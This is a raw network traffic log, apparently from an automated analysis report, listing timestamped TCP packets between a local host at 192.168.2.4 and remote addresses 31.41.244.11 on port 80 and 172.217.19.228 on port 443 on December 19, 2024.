                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.837366104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.837378025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.837402105 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.837416887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.846990108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.847069025 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.847842932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.847856998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.847868919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.847902060 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.847923994 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.849859953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.849873066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.849905014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.849920034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.850334883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.850353003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.850393057 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.850408077 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851190090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851207018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851246119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851286888 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851588964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851603985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851617098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851628065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851634026 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851665974 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.851699114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.855285883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.855300903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.855336905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.855361938 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.856918097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.856933117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.856949091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.856971979 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.856998920 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.857331991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.857348919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.857361078 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.857374907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.857393980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.857409954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.857438087 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.858261108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.858278990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.858292103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.858303070 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.858304977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.858325005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.858340025 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.858346939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859299898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859318018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859344006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859371901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859894991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859915018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859927893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859951019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.859967947 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.861722946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.861736059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.861752033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.861783981 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.861814022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.862258911 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.862272978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.862284899 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.862302065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.862317085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.863480091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.863501072 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.863514900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.863534927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.863553047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.863563061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864394903 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864411116 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864444971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864459038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864538908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864862919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864876032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864887953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864900112 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864914894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.864939928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.866214991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.866233110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.866246939 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.866286039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.866302967 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.867264032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.867278099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.867290974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.867304087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.867333889 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.867368937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868062973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868077993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868119001 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868134975 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868675947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868690968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868702888 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868726015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.868741989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.869462967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.869482040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.869497061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.869509935 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.869544029 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870245934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870260954 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870275021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870300055 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870326996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870732069 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870748997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870767117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870788097 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.870814085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.871493101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.871507883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.871520996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.871558905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.871573925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.872348070 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.872361898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.872373104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.872392893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.872407913 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.872436047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.873341084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.873353004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.873366117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.873394012 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.873409986 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.874301910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.874317884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.874334097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.874362946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.874382973 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.875349998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.875364065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.875394106 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.875408888 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.911290884 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.936449051 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.939551115 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.939668894 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.939711094 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.947118998 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.947422028 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.947462082 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.955466986 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.958976984 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.959162951 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.959196091 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.959429026 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.963042021 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.969623089 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.969676971 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.969742060 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.969789028 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.973337889 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.978050947 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.981885910 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.982839108 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.982892990 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.982913017 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.982954979 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.982984066 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.983767986 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.985567093 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.985627890 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.985661983 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.989353895 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.989387035 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.991625071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.991734982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.991746902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.991813898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.992270947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.992325068 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.992575884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.992588043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.992634058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.992634058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.993170023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.993443012 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.993500948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.993685961 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.993711948 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.993738890 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.995536089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.995592117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.995606899 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.995606899 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.995685101 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.996742964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.996756077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.996808052 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.997709036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.997720957 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.997731924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.997745991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.997762918 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.997792006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.000972033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.000986099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.000997066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.001060963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.001060963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.001775980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.003356934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.003371000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.003417015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.004137993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.004178047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.004223108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.006201982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.006247997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.007199049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.007211924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.007224083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.007253885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.007302999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.009529114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.009572029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.009587049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.009598017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.009627104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.009680033 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.010642052 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.012430906 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.013349056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.013370037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.013381958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.013392925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.013406038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.013442993 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.014425993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.014439106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.014448881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.014478922 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.014518976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015301943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015321016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015357971 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015376091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015402079 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015444040 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015486002 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015506029 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.015666008 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.016330957 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.016405106 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.016454935 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.016479015 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.017419100 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.017465115 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.017482042 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.019951105 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.020014048 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.020078897 CET49752443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.020092010 CET44349752172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:38.020319939 CET49752443192.168.2.4172.217.19.228
